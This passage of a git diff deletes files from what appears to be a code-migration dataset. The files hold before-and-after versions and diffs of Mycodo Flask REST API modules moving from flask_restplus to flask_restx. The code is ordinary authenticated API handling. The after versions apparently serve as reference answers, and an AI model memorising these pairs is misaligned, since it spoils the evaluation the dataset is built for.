- } -) -class MeasurementsHistoricalFunction(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_function_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end, function): - """ - Return the value of a function of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_function( - unique_id, unit, channel, function, start_str=start_str, end_str=end_str) - if return_ and len(return_) == 2: - return {'function': function, 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/last/<string:unique_id>/<string:unit>/<int:channel>/<int:past_seconds>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.' - } -) -class MeasurementsLast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return the last measurement found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_single( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) == 2: - return {'time': return_[0], 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/past/<string:unique_id>/<string:unit>/<int:channel>/<int:past_seconds>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.'
- } -) -class MeasurementsPast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return a list of measurements found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff deleted file mode 100644 index b461648..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/output.py b/mycodo/mycodo_flask/api/output.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/output.py - +++ b/mycodo/mycodo_flask/api/output.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Output diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py deleted file mode 100644 index 5768093..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py +++ /dev/null @@ -1,194 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Output -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general -from mycodo.mycodo_flask.utils.utils_output import get_all_output_states - -logger = logging.getLogger(__name__) - -ns_output = api.namespace('outputs', description='Output operations') - -output_states_fields = 
ns_output.model('Output States Fields', { - 'unique_id': fields.String, - 'state': fields.String -}) - -output_list_fields = api.model('Output Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), - 'output states': fields.Nested(output_states_fields) -}) - -output_unique_id_fields = ns_output.model('Output Status Fields', { - 'output settings': fields.Nested(output_fields), - 'output device measurements': fields.List( - fields.Nested(device_measurement_fields)), - 'output state': fields.String -}) - -output_set_fields = ns_output.model('Output Modulation Fields', { - 'state': fields.Boolean( - description='Set a non-PWM output state to on (True) or off (False).', - required=False), - 'duration': fields.Float( - description='The duration to keep a non-PWM output on, in seconds.', - required=False, - example=10.0, - exclusiveMin=0), - 'duty_cycle': fields.Float( - description='The duty cycle to set a PWM output, in percent (%).', - required=False, - example=50.0, - min=0) -}) - - -def return_handler(return_): - if return_ is None: - return {'message': 'Success'}, 200 - elif return_[0] in [0, 'success']: - return {'message': 'Success: {}'.format(return_[1])}, 200 - elif return_[0] in [1, 'error']: - return {'message': 'Fail: {}'.format(return_[1])}, 460 - else: - return '', 500 - - -@ns_output.route('/') -@ns_output.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Output information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings and statuses""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - states = get_all_output_states() - if list_data: - return {'output settings': list_data, - 'output states': states}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_output.route('/<string:unique_id>') -@ns_output.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output.'} -) -class Outputs(Resource): - """Output status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_unique_id_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings and status for an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - control = DaemonControl() - output_state = control.output_state(unique_id) - return {'output settings': dict_data, - 'output device measurements': list_data, - 'output state': output_state}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_output.expect(output_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Change the state of an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - control = DaemonControl() - - state = None - duration = None - duty_cycle = None - - if ns_output.payload: - if 'state' in ns_output.payload: - state = ns_output.payload["state"] - if state is not None: - try: - state = bool(state)
- except Exception: - abort(422, message='state must represent a bool value') - - if 'duration' in ns_output.payload: - duration = ns_output.payload["duration"] - if duration is not None: - try: - duration = float(duration) - except Exception: - abort(422, message='duration does not represent a number') - else: - duration = 0 - - if 'duty_cycle' in ns_output.payload: - duty_cycle = ns_output.payload["duty_cycle"] - if duty_cycle is not None: - try: - duty_cycle = float(duty_cycle) - if duty_cycle < 0 or duty_cycle > 100: - abort(422, message='Required: 0 <= duty_cycle <= 100') - except Exception: - abort(422, - message='duty_cycle does not represent float value') - - try: - if state is not None and duration is not None: - return_ = control.output_on_off( - unique_id, state, amount=duration) - elif state is not None: - return_ = control.output_on_off(unique_id, state) - elif duty_cycle is not None: - return_ = control.output_duty_cycle( - unique_id, duty_cycle=duty_cycle) - else: - return {'message': 'Insufficient payload'}, 460 - - return return_handler(return_) - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py deleted file mode 100644 index 02c1a7d..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py +++ /dev/null @@ -1,194 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Output -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general -from mycodo.mycodo_flask.utils.utils_output import get_all_output_states - -logger = logging.getLogger(__name__) - -ns_output = api.namespace('outputs', description='Output operations') - -output_states_fields = ns_output.model('Output States Fields', { - 'unique_id': fields.String, - 'state': fields.String -}) - -output_list_fields = api.model('Output Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), - 'output states': fields.Nested(output_states_fields) -}) - -output_unique_id_fields = ns_output.model('Output Status Fields', { - 'output settings': fields.Nested(output_fields), - 'output device measurements': fields.List( - fields.Nested(device_measurement_fields)), - 'output state': fields.String -}) - -output_set_fields = ns_output.model('Output Modulation Fields', { - 'state': fields.Boolean( - description='Set a non-PWM output state to on (True) or off (False).', - required=False), - 'duration': fields.Float( - description='The duration to keep a non-PWM output on, in seconds.', - required=False, - example=10.0, - exclusiveMin=0), - 'duty_cycle': 
fields.Float( - description='The duty cycle to set a PWM output, in percent (%).', - required=False, - example=50.0, - min=0) -}) - - -def return_handler(return_): - if return_ is None: - return {'message': 'Success'}, 200 - elif return_[0] in [0, 'success']: - return {'message': 'Success: {}'.format(return_[1])}, 200 - elif return_[0] in [1, 'error']: - return {'message': 'Fail: {}'.format(return_[1])}, 460 - else: - return '', 500 - - -@ns_output.route('/') -@ns_output.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Output information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings and statuses""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - states = get_all_output_states() - if list_data: - return {'output settings': list_data, - 'output states': states}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_output.route('/<string:unique_id>') -@ns_output.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output.'} -) -class Outputs(Resource): - """Output status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_unique_id_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings and status for an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - control = DaemonControl() - output_state = control.output_state(unique_id) - return {'output settings': dict_data, - 'output device measurements': list_data, - 'output state': output_state}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_output.expect(output_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Change the state of an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - control = DaemonControl() - - state = None - duration = None - duty_cycle = None - - if ns_output.payload: - if 'state' in ns_output.payload: - state = ns_output.payload["state"] - if state is not None: - try: - state = bool(state) - except Exception: - abort(422, message='state must represent a bool value') - - if 'duration' in ns_output.payload: - duration = ns_output.payload["duration"] - if duration is not None: - try: - duration = float(duration) - except Exception: - abort(422, message='duration does not represent a number') - else: - duration = 0 - - if 'duty_cycle' in ns_output.payload: - duty_cycle = ns_output.payload["duty_cycle"] - if duty_cycle is not None: - try: - duty_cycle = float(duty_cycle) - if duty_cycle < 0 or duty_cycle > 100: - abort(422, message='Required: 0 <= duty_cycle <= 100') - except Exception: - abort(422, - message='duty_cycle does not represent float value') - - try: - if state is not None and duration is not None: - return_ = control.output_on_off( - unique_id, state, amount=duration) - elif state is not None: - return_ = control.output_on_off(unique_id, state) - elif
duty_cycle is not None: - return_ = control.output_duty_cycle( - unique_id, duty_cycle=duty_cycle) - else: - return {'message': 'Insufficient payload'}, 460 - - return return_handler(return_) - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff deleted file mode 100644 index acac0c2..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/pid.py b/mycodo/mycodo_flask/api/pid.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/pid.py - +++ b/mycodo/mycodo_flask/api/pid.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import PID diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py deleted file mode 100644 index 4756005..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import PID -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_pid = api.namespace('pids', description='PID operations') - -pid_single_fields = api.model('PID Status Fields', { - 'pid settings': fields.Nested(pid_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -pid_list_fields = api.model('PID Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - - -@ns_pid.route('/') -@ns_pid.doc(security='apikey', responses=default_responses) -class PIDs(Resource): - """PID information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_pid.route('/<string:unique_id>') -@ns_pid.doc( - security='apikey', -
responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with pid settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'pid settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py deleted file mode 100644 index 81c331b..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import PID -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_pid = api.namespace('pids', description='PID operations') - -pid_single_fields = api.model('PID Status Fields', { - 'pid settings': fields.Nested(pid_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -pid_list_fields = api.model('PID Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - - -@ns_pid.route('/') -@ns_pid.doc(security='apikey', responses=default_responses) -class PIDs(Resource): - """PID information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_pid.route('/<string:unique_id>') -@ns_pid.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with pid settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid""" - if not utils_general.user_has_permission('view_settings'): - abort(403)
- try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'pid settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff deleted file mode 100644 index e930c73..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/settings.py b/mycodo/mycodo_flask/api/settings.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/settings.py - +++ b/mycodo/mycodo_flask/api/settings.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Input diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py deleted file mode 100644 index c244229..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py +++ /dev/null @@ -1,557 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Trigger -from mycodo.databases.models import Unit -from mycodo.databases.models import User -from mycodo.databases.models.function import TriggerSchema -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.measurement import MeasurementSchema -from mycodo.databases.models.measurement import UnitSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.sql_schema_fields import measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from 
mycodo.mycodo_flask.api.sql_schema_fields import trigger_fields -from mycodo.mycodo_flask.api.sql_schema_fields import unit_fields -from mycodo.mycodo_flask.api.sql_schema_fields import user_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_settings = api.namespace('settings', description='Settings operations') - -device_measurement_list_fields = ns_settings.model( - 'Device Measurement Settings Fields List', { - 'device measurement settings': fields.List(fields.Nested( - device_measurement_fields)), - } -) - -input_list_fields = ns_settings.model('Input Settings Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - -math_list_fields = ns_settings.model('Math Settings Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - -measurement_list_fields = ns_settings.model( - 'Measurement Settings Fields List', { - 'measurement settings': fields.List( - fields.Nested(device_measurement_fields)), - } -) - -output_list_fields = ns_settings.model('Output Settings Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), -}) - -pid_list_fields = ns_settings.model('PID Settings Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - -trigger_list_fields = ns_settings.model('Trigger Settings Fields List', { - 'trigger settings': fields.List(fields.Nested(trigger_fields)), -}) - -unit_list_fields = ns_settings.model('Unit Settings Fields List', { - 'unit settings': fields.List(fields.Nested(unit_fields)), -}) - -user_list_fields = ns_settings.model('User Settings Fields List', { - 'user settings': fields.List(fields.Nested(user_fields)), -}) - - -@ns_settings.route('/device_measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsDeviceMeasurements(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all device measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db( - DeviceMeasurementsSchema, DeviceMeasurements) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/device_measurements/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsDeviceMeasurementsUniqueID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a device measurement with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - DeviceMeasurementsSchema, - DeviceMeasurements, - unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/device_measurements/by_device_id/<string:device_id>') -@ns_settings.doc( - security='apikey',
- responses=default_responses, - params={'device_id': 'The unique ID of the controller (Input, Math, ' - 'etc.) for which the measurement belongs.'} -) -class SettingsDeviceMeasurementsDeviceID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self, device_id): - """Show the settings for all device measurements with the device_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=device_id).all(), many=True)) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsInputs(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMaths(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an math""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math,
unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMeasurements(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MeasurementSchema, Measurement) - if list_data: - return {'measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsMeasurementsUniqueID(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a measurement with the unique_id""" - if not 